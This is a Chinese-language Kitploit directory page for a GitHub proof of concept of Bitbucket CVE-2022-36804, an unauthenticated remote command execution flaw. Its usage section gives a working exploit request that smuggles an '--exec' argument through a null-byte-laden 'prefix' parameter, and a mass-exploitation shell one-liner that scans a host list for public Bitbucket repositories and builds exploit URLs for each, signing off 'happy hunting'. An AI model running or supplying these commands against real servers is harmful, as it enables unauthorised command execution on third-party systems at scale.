Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-36804-POC — Bitbucket CVE-2022-36804 未认证的远程命令执行 | Kitploit
工具/GitHubGitHub/kljunowsky/cve-2022-36804-poc
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubkljunowsky/cve-2022-36804-poc

CVE-2022-36804-POC

Bitbucket CVE-2022-36804 未认证的远程命令执行

查看仓库
733年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-36804-POC 🕷️

Bitbucket CVE-2022-36804 未认证远程命令执行

利用方法

寻找公开可见的仓库 - example.com/repos?visibility=public

/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin

批量利用

for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done

访问构造好的URL :)

祝狩猎愉快!🐺

Twitter

LinkedIn

下载工具